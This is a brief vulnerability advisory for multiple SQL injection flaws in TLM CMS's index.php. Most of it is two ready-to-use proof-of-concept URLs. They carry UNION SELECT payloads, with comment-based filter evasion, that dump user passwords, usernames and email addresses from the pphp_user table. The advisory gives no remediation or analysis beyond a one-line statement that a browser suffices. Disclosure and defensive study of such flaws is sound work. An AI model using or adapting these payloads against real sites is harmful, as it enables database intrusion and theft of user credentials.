TLM CMS 'index.php' Multiple SQL Injection Vulnerabilities

TLM CMS 'index.php' Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/tlmcms_v1-1/tlmcms/index.php?affiche=Photo-Photo&ID=1'/**/union/**/select/**/0,1,concat(US_pwd),concat(US_pseudo),concat(US_mail)/**/from/**/pphp_user/*
http://www.example.com/tlmcms_v1-1/tlmcms/index.php?affiche=Comment&act=lire&idnews=-99999999/**/union/**/select/**/0,1,concat(US_mail),concat(US_pseudo),concat(US_pwd),5,6,7,8,9,10/**/from/**/pphp_user/*